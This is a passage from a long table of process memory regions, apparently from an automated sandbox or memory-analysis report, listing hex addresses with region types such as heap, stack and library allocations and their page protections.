heap
|
page read and write
|
||
3BE1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
125324E9000
|
heap
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
19EE7CBE000
|
trusted library allocation
|
page read and write
|
||
1CBBF867000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
D43000
|
trusted library allocation
|
page execute and read and write
|
||
2FF5000
|
trusted library allocation
|
page read and write
|
||
2F7F000
|
stack
|
page read and write
|
||
12D359F2000
|
heap
|
page read and write
|
||
1CBBF882000
|
heap
|
page read and write
|
||
24FB61A4000
|
heap
|
page read and write
|
||
156A000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
56DE000
|
stack
|
page read and write
|
||
2FA1000
|
trusted library allocation
|
page read and write
|
||
3013000
|
trusted library allocation
|
page read and write
|
||
27802A18000
|
trusted library allocation
|
page read and write
|
||
1CBBF88B000
|
heap
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
15F8000
|
heap
|
page read and write
|
||
19EE80C0000
|
trusted library allocation
|
page read and write
|
||
1CBBDCD0000
|
heap
|
page read and write
|
||
1CAA2C20000
|
heap
|
page read and write
|
||
1CBBF85B000
|
heap
|
page read and write
|
||
12D34ECA000
|
heap
|
page read and write
|
||
1560000
|
trusted library allocation
|
page read and write
|
||
305F000
|
trusted library allocation
|
page read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
1570000
|
trusted library allocation
|
page read and write
|
||
2FE5000
|
trusted library allocation
|
page read and write
|
||
1FD30F90000
|
heap
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
1CA8B136000
|
trusted library allocation
|
page read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
169B55E3000
|
heap
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
125324A4000
|
heap
|
page read and write
|
||
161B3510000
|
trusted library allocation
|
page read and write
|
||
169B6088000
|
heap
|
page read and write
|
||
30DD000
|
trusted library allocation
|
page read and write
|
||
5AB0000
|
unkown
|
page read and write
|
||
160D000
|
heap
|
page read and write
|
||
2FF7000
|
trusted library allocation
|
page read and write
|
||
E7E000
|
stack
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
12D35003000
|
trusted library allocation
|
page read and write
|
||
5720000
|
trusted library allocation
|
page read and write
|
||
1CBBF7FF000
|
heap
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
11A0000
|
heap
|
page read and write
|
||
1CA88B87000
|
heap
|
page read and write
|
||
7FFD9B48D000
|
trusted library allocation
|
page execute and read and write
|
||
1CA9AB41000
|
trusted library allocation
|
page read and write
|
||
1626000
|
heap
|
page read and write
|
||
7FFD9B590000
|
trusted library allocation
|
page execute and read and write
|
||
1CA88B00000
|
heap
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
7FFD9B6A0000
|
trusted library allocation
|
page read and write
|
||
1CBBF855000
|
heap
|
page read and write
|
||
278044F5000
|
trusted library allocation
|
page read and write
|
||
32FD000
|
trusted library allocation
|
page read and write
|
||
2F70000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
278107A0000
|
trusted library allocation
|
page read and write
|
||
1CBBF861000
|
heap
|
page read and write
|
||
3053000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF888000
|
heap
|
page read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
1CAA2E34000
|
heap
|
page read and write
|
||
257B81B4000
|
heap
|
page read and write
|
||
2FAD000
|
trusted library allocation
|
page read and write
|
||
AA8000
|
heap
|
page read and write
|
||
278105C7000
|
trusted library allocation
|
page read and write
|
||
4F70000
|
heap
|
page execute and read and write
|
||
5AD0000
|
unkown
|
page read and write
|
||
2780341C000
|
trusted library allocation
|
page read and write
|
||
565E000
|
stack
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
64626FE000
|
stack
|
page read and write
|
||
9C8474E000
|
stack
|
page read and write
|
||
257B7DA9000
|
heap
|
page read and write
|
||
1CBBF863000
|
heap
|
page read and write
|
||
1C4854E000
|
stack
|
page read and write
|
||
ECF000
|
stack
|
page read and write
|
||
4E4C000
|
heap
|
page read and write
|
||
169B55E3000
|
heap
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
278029E2000
|
trusted library allocation
|
page read and write
|
||
1CBBF900000
|
heap
|
page read and write
|
||
9E22278000
|
stack
|
page read and write
|
||
24FB5F99000
|
heap
|
page read and write
|
||
1CBBF867000
|
heap
|
page read and write
|
||
1CBBF864000
|
heap
|
page read and write
|
||
306B000
|
trusted library allocation
|
page read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
24FB61AE000
|
heap
|
page read and write
|
||
1822000
|
trusted library allocation
|
page execute and read and write
|
||
19EE86C7000
|
trusted library allocation
|
page read and write
|
||
19EE7860000
|
heap
|
page read and write
|
||
15B0000
|
heap
|
page read and write
|
||
57E0000
|
heap
|
page read and write
|
||
12532491000
|
heap
|
page read and write
|
||
1CAA2E2C000
|
heap
|
page read and write
|
||
1CBBF87A000
|
heap
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
1CBBF87A000
|
heap
|
page read and write
|
||
9C833EE000
|
stack
|
page read and write
|
||
1CBBF87F000
|
heap
|
page read and write
|
||
1CBBDCDE000
|
heap
|
page read and write
|
||
DC2000
|
trusted library allocation
|
page execute and read and write
|
||
19EFFDA0000
|
heap
|
page read and write
|
||
279F000
|
stack
|
page read and write
|
||
278110F5000
|
trusted library allocation
|
page read and write
|
||
12D34ED0000
|
heap
|
page read and write
|
||
1FD312D0000
|
trusted library allocation
|
page read and write
|
||
2FCF000
|
trusted library allocation
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
3033000
|
trusted library allocation
|
page read and write
|
||
19EE5D1A000
|
heap
|
page read and write
|
||
5DDF000
|
stack
|
page read and write
|
||
D90000
|
trusted library allocation
|
page read and write
|
||
125324B6000
|
heap
|
page read and write
|
||
5EDF000
|
stack
|
page read and write
|
||
9F994FE000
|
stack
|
page read and write
|
||
161B3344000
|
heap
|
page read and write
|
||
19EE870A000
|
trusted library allocation
|
page read and write
|
||
1CA8B648000
|
trusted library allocation
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
1CBBF7EB000
|
heap
|
page read and write
|
||
161B33D1000
|
heap
|
page read and write
|
||
2FDF000
|
trusted library allocation
|
page read and write
|
||
169B56D0000
|
trusted library allocation
|
page read and write
|
||
5B7C000
|
stack
|
page read and write
|
||
D7F000
|
stack
|
page read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
125324EE000
|
heap
|
page read and write
|
||
169B5470000
|
heap
|
page read and write
|
||
B78000
|
heap
|
page read and write
|
||
7FFD9B670000
|
trusted library allocation
|
page execute and read and write
|
||
2E70000
|
heap
|
page execute and read and write
|
||
19EF7BC1000
|
trusted library allocation
|
page read and write
|
||
C0E000
|
stack
|
page read and write
|
||
1FD30FB4000
|
heap
|
page read and write
|
||
1CBBF84A000
|
heap
|
page read and write
|
||
3A818FF000
|
stack
|
page read and write
|
||
4D60000
|
direct allocation
|
page execute and read and write
|
||
301F000
|
trusted library allocation
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
257B7D94000
|
heap
|
page read and write
|
||
5582000
|
heap
|
page read and write
|
||
E37000
|
trusted library allocation
|
page execute and read and write
|
||
13A0000
|
heap
|
page read and write
|
||
7FFD9B480000
|
trusted library allocation
|
page read and write
|
||
14AE000
|
stack
|
page read and write
|
||
27812239000
|
trusted library allocation
|
page read and write
|
||
19EE5EC0000
|
trusted library allocation
|
page read and write
|
||
183B000
|
trusted library allocation
|
page execute and read and write
|
||
1CA8AB30000
|
heap
|
page read and write
|
||
27810011000
|
trusted library allocation
|
page read and write
|
||
9E21E73000
|
stack
|
page read and write
|
||
7FFD9B640000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6E0000
|
trusted library allocation
|
page read and write
|
||
278044A8000
|
trusted library allocation
|
page read and write
|
||
19EE7CAE000
|
trusted library allocation
|
page read and write
|
||
12D34ECC000
|
heap
|
page read and write
|
||
3500000
|
heap
|
page read and write
|
||
304D000
|
trusted library allocation
|
page read and write
|
||
2FC7000
|
trusted library allocation
|
page read and write
|
||
1CAA2D40000
|
heap
|
page read and write
|
||
1CA88B08000
|
heap
|
page read and write
|
||
3073000
|
trusted library allocation
|
page read and write
|
||
9C839F9000
|
stack
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1FD30FCF000
|
heap
|
page read and write
|
||
308F000
|
trusted library allocation
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
15F0000
|
heap
|
page read and write
|
||
169B524D000
|
trusted library allocation
|
page read and write
|
||
161B4D11000
|
heap
|
page read and write
|
||
939000
|
stack
|
page read and write
|
||
19EFFDCE000
|
heap
|
page read and write
|
||
24FB62A0000
|
heap
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
12F9000
|
stack
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
12D34EC2000
|
heap
|
page read and write
|
||
15B8000
|
heap
|
page read and write
|
||
12D3503F000
|
trusted library allocation
|
page read and write
|
||
19EE8662000
|
trusted library allocation
|
page read and write
|
||
1CBBF85B000
|
heap
|
page read and write
|
||
19EE8058000
|
trusted library allocation
|
page read and write
|
||
B2E000
|
stack
|
page read and write
|
||
1253245E000
|
heap
|
page read and write
|
||
1CBBF87F000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
3071000
|
trusted library allocation
|
page read and write
|
||
27802950000
|
trusted library allocation
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
4E9A000
|
heap
|
page read and write
|
||
125324DA000
|
heap
|
page read and write
|
||
1CA88A50000
|
heap
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
1FD30FCF000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
7FFD9B556000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
27800394000
|
trusted library allocation
|
page read and write
|
||
DDB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
1050000
|
heap
|
page read and write
|
||
1CBBD940000
|
heap
|
page read and write
|
||
1CBBF802000
|
heap
|
page read and write
|
||
161B3345000
|
heap
|
page read and write
|
||
18CB000
|
trusted library allocation
|
page execute and read and write
|
||
9C8484D000
|
stack
|
page read and write
|
||
24FB5FA4000
|
heap
|
page read and write
|
||
C4E000
|
stack
|
page read and write
|
||
1CA8A4A0000
|
heap
|
page readonly
|
||
BA6000
|
heap
|
page read and write
|
||
564E000
|
stack
|
page read and write
|
||
1CA88AC0000
|
heap
|
page read and write
|
||
3A816F9000
|
stack
|
page read and write
|
||
125324B6000
|
heap
|
page read and write
|
||
9E2207D000
|
stack
|
page read and write
|
||
7FFD9B63A000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
306F000
|
trusted library allocation
|
page read and write
|
||
1CBBF855000
|
heap
|
page read and write
|
||
19E80210000
|
heap
|
page read and write
|
||
50BE000
|
stack
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
9E2308E000
|
stack
|
page read and write
|
||
32BA000
|
trusted library allocation
|
page read and write
|
||
3083000
|
trusted library allocation
|
page read and write
|
||
27818001000
|
trusted library allocation
|
page read and write
|
||
12D35005000
|
trusted library allocation
|
page read and write
|
||
9E2310E000
|
stack
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
1CAA2E9A000
|
heap
|
page read and write
|
||
125324EE000
|
heap
|
page read and write
|
||
1253253F000
|
heap
|
page read and write
|
||
257B8080000
|
heap
|
page read and write
|
||
161B3343000
|
heap
|
page read and write
|
||
121E000
|
heap
|
page read and write
|
||
2FED000
|
trusted library allocation
|
page read and write
|
||
161B4D0E000
|
heap
|
page read and write
|
||
12D35020000
|
trusted library allocation
|
page read and write
|
||
11BF000
|
heap
|
page read and write
|
||
12D34ED0000
|
heap
|
page read and write
|
||
278029BD000
|
trusted library allocation
|
page read and write
|
||
1CBBF802000
|
heap
|
page read and write
|
||
C75000
|
heap
|
page read and write
|
||
161B3370000
|
heap
|
page read and write
|
||
19EE7865000
|
heap
|
page read and write
|
||
9F9957E000
|
stack
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
169B5249000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
5CCD000
|
unkown
|
page read and write
|
||
2781182C000
|
trusted library allocation
|
page read and write
|
||
59D0000
|
trusted library allocation
|
page execute and read and write
|
||
3202000
|
heap
|
page read and write
|
||
7FFD9B610000
|
trusted library allocation
|
page read and write
|
||
2B2D000
|
trusted library allocation
|
page read and write
|
||
5D56000
|
unkown
|
page read and write
|
||
DF2000
|
trusted library allocation
|
page execute and read and write
|
||
304F000
|
trusted library allocation
|
page read and write
|
||
32CC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B482000
|
trusted library allocation
|
page read and write
|
||
1CBBDCD5000
|
heap
|
page read and write
|
||
1FD32BD0000
|
heap
|
page read and write
|
||
1CBBF87E000
|
heap
|
page read and write
|
||
4F70000
|
heap
|
page read and write
|
||
1CAA2E9F000
|
heap
|
page read and write
|
||
73B000
|
stack
|
page read and write
|
||
7FFD9B52C000
|
trusted library allocation
|
page execute and read and write
|
||
1333000
|
trusted library allocation
|
page execute and read and write
|
||
12532542000
|
heap
|
page read and write
|
||
12D35080000
|
trusted library allocation
|
page execute
|
||
1CBBF86E000
|
heap
|
page read and write
|
||
19EFFDBA000
|
heap
|
page read and write
|
||
1CAA2CC4000
|
heap
|
page read and write
|
||
3067000
|
trusted library allocation
|
page read and write
|
||
3019000
|
trusted library allocation
|
page read and write
|
||
11CB000
|
heap
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
306D000
|
trusted library allocation
|
page read and write
|
||
1CAA2C16000
|
heap
|
page execute and read and write
|
||
3005000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
E79000
|
heap
|
page read and write
|
||
9C83B7E000
|
stack
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
1FD32C74000
|
heap
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
3011000
|
trusted library allocation
|
page read and write
|
||
161B33CA000
|
heap
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
7FFD9B680000
|
trusted library allocation
|
page read and write
|
||
2FC9000
|
trusted library allocation
|
page read and write
|
||
1CAA2CB6000
|
heap
|
page read and write
|
||
11C4000
|
heap
|
page read and write
|
||
2FE3000
|
trusted library allocation
|
page read and write
|
||
12D342A7000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF854000
|
heap
|
page read and write
|
||
125326AD000
|
heap
|
page read and write
|
||
1CBBF877000
|
heap
|
page read and write
|
||
55BE000
|
stack
|
page read and write
|
||
161B4D09000
|
heap
|
page read and write
|
||
125324F7000
|
heap
|
page read and write
|
||
83B000
|
stack
|
page read and write
|
||
2FBF000
|
trusted library allocation
|
page read and write
|
||
9E22539000
|
stack
|
page read and write
|
||
9E223B7000
|
stack
|
page read and write
|
||
119E000
|
stack
|
page read and write
|
||
585E000
|
stack
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
9F99978000
|
stack
|
page read and write
|
||
2F91000
|
trusted library allocation
|
page read and write
|
||
169B55EB000
|
heap
|
page read and write
|
||
FAB000
|
stack
|
page read and write
|
||
2F9F000
|
trusted library allocation
|
page read and write
|
||
125324A4000
|
heap
|
page read and write
|
||
19EE7CF5000
|
trusted library allocation
|
page read and write
|
||
169B55E9000
|
heap
|
page read and write
|
||
303F000
|
trusted library allocation
|
page read and write
|
||
142E000
|
stack
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
24FB5FA8000
|
heap
|
page read and write
|
||
169B56EF000
|
trusted library allocation
|
page read and write
|
||
278029C4000
|
trusted library allocation
|
page read and write
|
||
19E8025B000
|
heap
|
page read and write
|
||
19EE7CFB000
|
trusted library allocation
|
page read and write
|
||
32DD000
|
trusted library allocation
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
12533F44000
|
heap
|
page read and write
|
||
599E000
|
stack
|
page read and write
|
||
27819401000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
1CBBF871000
|
heap
|
page read and write
|
||
1CBBF86D000
|
heap
|
page read and write
|
||
3FED000
|
trusted library allocation
|
page read and write
|
||
1CBBF878000
|
heap
|
page read and write
|
||
125324EE000
|
heap
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
1CA88A80000
|
heap
|
page read and write
|
||
1CA8AC62000
|
trusted library allocation
|
page read and write
|
||
12533E50000
|
heap
|
page read and write
|
||
161B3327000
|
heap
|
page read and write
|
||
1CBBF854000
|
heap
|
page read and write
|
||
1CBBF876000
|
heap
|
page read and write
|
||
12D34590000
|
heap
|
page readonly
|
||
12D34ED4000
|
heap
|
page read and write
|
||
125323F0000
|
heap
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1CBBF878000
|
heap
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
2FF0000
|
direct allocation
|
page read and write
|
||
7FFD9B474000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
1CAA2C57000
|
heap
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
326B000
|
trusted library allocation
|
page read and write
|
||
1CA8AC99000
|
trusted library allocation
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
19EFFCE0000
|
heap
|
page execute and read and write
|
||
27800001000
|
trusted library allocation
|
page read and write
|
||
27810878000
|
trusted library allocation
|
page read and write
|
||
1CBBDB10000
|
heap
|
page read and write
|
||
54EC000
|
heap
|
page read and write
|
||
1CA8A520000
|
trusted library allocation
|
page read and write
|
||
302F000
|
trusted library allocation
|
page read and write
|
||
161B339A000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1572000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF854000
|
heap
|
page read and write
|
||
161B3391000
|
heap
|
page read and write
|
||
1CA9ABB1000
|
trusted library allocation
|
page read and write
|
||
1C480FE000
|
stack
|
page read and write
|
||
1CBBF803000
|
heap
|
page read and write
|
||
3F8D000
|
trusted library allocation
|
page read and write
|
||
E5D000
|
heap
|
page read and write
|
||
169B608F000
|
heap
|
page read and write
|
||
19E80220000
|
heap
|
page read and write
|
||
5760000
|
heap
|
page read and write
|
||
9C84A8D000
|
stack
|
page read and write
|
||
1FD311B0000
|
heap
|
page read and write
|
||
190E000
|
stack
|
page read and write
|
||
161B3343000
|
heap
|
page read and write
|
||
8D5B0F9000
|
stack
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
1CA8B678000
|
trusted library allocation
|
page read and write
|
||
12533F40000
|
heap
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
5BEE000
|
stack
|
page read and write
|
||
8D5B1FF000
|
stack
|
page read and write
|
||
2FC5000
|
trusted library allocation
|
page read and write
|
||
24FB6150000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
27804506000
|
trusted library allocation
|
page read and write
|
||
330D000
|
trusted library allocation
|
page read and write
|
||
1FD32C70000
|
heap
|
page read and write
|
||
1CAA2EC4000
|
heap
|
page read and write
|
||
161B339A000
|
heap
|
page read and write
|
||
169B55E9000
|
heap
|
page read and write
|
||
326D000
|
trusted library allocation
|
page read and write
|
||
3039000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
3075000
|
trusted library allocation
|
page read and write
|
||
24FB5F00000
|
heap
|
page read and write
|
||
7FFD9B640000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
257B7DA7000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1CAA2C10000
|
heap
|
page execute and read and write
|
||
12D34ED4000
|
heap
|
page read and write
|
||
27B0000
|
heap
|
page execute and read and write
|
||
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
9E222BE000
|
stack
|
page read and write
|
||
D67000
|
trusted library allocation
|
page execute and read and write
|
||
32D4000
|
trusted library allocation
|
page read and write
|
||
1CA8A470000
|
trusted library allocation
|
page read and write
|
||
5C20000
|
unkown
|
page read and write
|
||
2FB7000
|
trusted library allocation
|
page read and write
|
||
278044DB000
|
trusted library allocation
|
page read and write
|
||
32EB000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
12D35009000
|
trusted library allocation
|
page read and write
|
||
4D30000
|
trusted library section
|
page read and write
|
||
24FB61A4000
|
heap
|
page read and write
|
||
161A000
|
heap
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
9C84A0A000
|
stack
|
page read and write
|
||
1567000
|
trusted library allocation
|
page execute and read and write
|
||
19EE5CCE000
|
heap
|
page read and write
|
||
7FFD9B483000
|
trusted library allocation
|
page execute and read and write
|
||
2F8F000
|
trusted library allocation
|
page read and write
|
||
1CBBF802000
|
heap
|
page read and write
|
||
7FFD9B48B000
|
trusted library allocation
|
page read and write
|
||
125326A0000
|
heap
|
page read and write
|
||
2FD7000
|
trusted library allocation
|
page read and write
|
||
1310000
|
heap
|
page read and write
|
||
3063000
|
trusted library allocation
|
page read and write
|
||
1CBBF7F3000
|
heap
|
page read and write
|
||
2C03000
|
trusted library allocation
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
12D34EB0000
|
heap
|
page read and write
|
||
1CBBF854000
|
heap
|
page read and write
|
||
9F995FB000
|
stack
|
page read and write
|
||
161B32A0000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
9F9A90C000
|
stack
|
page read and write
|
||
7FFD9B530000
|
trusted library allocation
|
page read and write
|
||
390D000
|
trusted library allocation
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
278029E4000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
4E6E000
|
stack
|
page read and write
|
||
1CBBF800000
|
heap
|
page read and write
|
||
169B55DA000
|
heap
|
page read and write
|
||
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
1CBBDCDE000
|
heap
|
page read and write
|
||
5BA0000
|
unkown
|
page read and write
|
||
8D5B44E000
|
stack
|
page read and write
|
||
19EE5EE5000
|
heap
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
9E224BE000
|
stack
|
page read and write
|
||
12D342AE000
|
heap
|
page read and write
|
||
19EE7D49000
|
trusted library allocation
|
page read and write
|
||
1CA8AB41000
|
trusted library allocation
|
page read and write
|
||
9E2318D000
|
stack
|
page read and write
|
||
11A8000
|
heap
|
page read and write
|
||
E7C000
|
heap
|
page read and write
|
||
24FB62A6000
|
heap
|
page read and write
|
||
4D083FE000
|
stack
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
1CAA2E63000
|
heap
|
page read and write
|
||
1CBBDCD9000
|
heap
|
page read and write
|
||
1CBBF87C000
|
heap
|
page read and write
|
||
1130000
|
heap
|
page read and write
|
||
19EE8657000
|
trusted library allocation
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
D80000
|
trusted library allocation
|
page read and write
|
||
1FD31160000
|
heap
|
page read and write
|
||
581F000
|
stack
|
page read and write
|
||
19EE7690000
|
trusted library allocation
|
page read and write
|
||
57F0000
|
direct allocation
|
page execute and read and write
|
||
19E8022E000
|
heap
|
page read and write
|
||
307D000
|
trusted library allocation
|
page read and write
|
||
1CBBF878000
|
heap
|
page read and write
|
||
3484000
|
heap
|
page read and write
|
||
5450000
|
direct allocation
|
page execute and read and write
|
||
4D51000
|
trusted library allocation
|
page read and write
|
||
125324FE000
|
heap
|
page read and write
|
||
27801798000
|
trusted library allocation
|
page read and write
|
||
9F991EE000
|
stack
|
page read and write
|
||
1FD32C7D000
|
heap
|
page read and write
|
||
19EE8638000
|
trusted library allocation
|
page read and write
|
||
1CA8B5B0000
|
trusted library allocation
|
page read and write
|
||
4F3E000
|
stack
|
page read and write
|
||
30B7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B710000
|
trusted library allocation
|
page read and write
|
||
1CA8ABC9000
|
trusted library allocation
|
page read and write
|
||
19EE5EE0000
|
heap
|
page read and write
|
||
19EE76A0000
|
heap
|
page readonly
|
||
574E000
|
stack
|
page read and write
|
||
3051000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
134D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
257B7F90000
|
heap
|
page read and write
|
||
DEA000
|
trusted library allocation
|
page execute and read and write
|
||
12D34EB4000
|
heap
|
page read and write
|
||
543E000
|
trusted library allocation
|
page read and write
|
||
19EE7BB1000
|
trusted library allocation
|
page read and write
|
||
1CA88A75000
|
heap
|
page read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
2FC3000
|
trusted library allocation
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
12532519000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
157A000
|
trusted library allocation
|
page execute and read and write
|
||
9E21EFF000
|
stack
|
page read and write
|
||
7FFD9B536000
|
trusted library allocation
|
page read and write
|
||
7FFD9B631000
|
trusted library allocation
|
page read and write
|
||
12D34290000
|
heap
|
page read and write
|
||
27802983000
|
trusted library allocation
|
page read and write
|
||
15E6000
|
heap
|
page read and write
|
||
278044DD000
|
trusted library allocation
|
page read and write
|
||
2FB1000
|
trusted library allocation
|
page read and write
|
||
D90000
|
trusted library allocation
|
page read and write
|
||
302D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B740000
|
trusted library allocation
|
page read and write
|
||
9F9967F000
|
stack
|
page read and write
|
||
328D000
|
trusted library allocation
|
page read and write
|
||
12532660000
|
trusted library allocation
|
page read and write
|
||
7FFD9B490000
|
trusted library allocation
|
page read and write
|
||
11D8000
|
heap
|
page read and write
|
||
9F99AFF000
|
stack
|
page read and write
|
||
1CBBF863000
|
heap
|
page read and write
|
||
3278000
|
trusted library allocation
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
9C83BFE000
|
stack
|
page read and write
|
||
1CBBD947000
|
heap
|
page read and write
|
||
9C838FE000
|
stack
|
page read and write
|
||
1CA8AB9E000
|
trusted library allocation
|
page read and write
|
||
12D34294000
|
heap
|
page read and write
|
||
1339000
|
stack
|
page read and write
|
||
799000
|
stack
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
1CA8AC4E000
|
trusted library allocation
|
page read and write
|
||
169B55D0000
|
heap
|
page read and write
|
||
161B336B000
|
heap
|
page read and write
|
||
301D000
|
trusted library allocation
|
page read and write
|
||
3505000
|
heap
|
page read and write
|
||
27804509000
|
trusted library allocation
|
page read and write
|
||
27800D98000
|
trusted library allocation
|
page read and write
|
||
2EFB000
|
stack
|
page read and write
|
||
19EFFE32000
|
heap
|
page read and write
|
||
2DA0000
|
heap
|
page read and write
|
||
1CBBF800000
|
heap
|
page read and write
|
||
9E223BE000
|
stack
|
page read and write
|
||
12D34ECA000
|
heap
|
page read and write
|
||
19EE86D1000
|
trusted library allocation
|
page read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
1CBBDCD9000
|
heap
|
page read and write
|
||
161B4CF0000
|
heap
|
page read and write
|
||
1CBBDA33000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1CA8AAE0000
|
heap
|
page execute and read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
3077000
|
trusted library allocation
|
page read and write
|
||
125324EA000
|
heap
|
page read and write
|
||
125326A6000
|
heap
|
page read and write
|
||
D3E000
|
stack
|
page read and write
|
||
D50000
|
trusted library allocation
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
1CA8B5CB000
|
trusted library allocation
|
page read and write
|
||
3027000
|
trusted library allocation
|
page read and write
|
||
289E000
|
stack
|
page read and write
|
||
9F991A3000
|
stack
|
page read and write
|
||
161B3500000
|
trusted library allocation
|
page read and write
|
||
27802966000
|
trusted library allocation
|
page read and write
|
||
1FD30F9F000
|
heap
|
page read and write
|
||
E12000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF877000
|
heap
|
page read and write
|
||
9F99876000
|
stack
|
page read and write
|
||
9F999F8000
|
stack
|
page read and write
|
||
E18000
|
heap
|
page read and write
|
||
24FB5FAE000
|
heap
|
page read and write
|
||
1CBBF875000
|
heap
|
page read and write
|
||
12532491000
|
heap
|
page read and write
|
||
AF9000
|
stack
|
page read and write
|
||
169B55DA000
|
heap
|
page read and write
|
||
9E226BB000
|
stack
|
page read and write
|
||
1CA8B050000
|
trusted library allocation
|
page read and write
|
||
D5D000
|
trusted library allocation
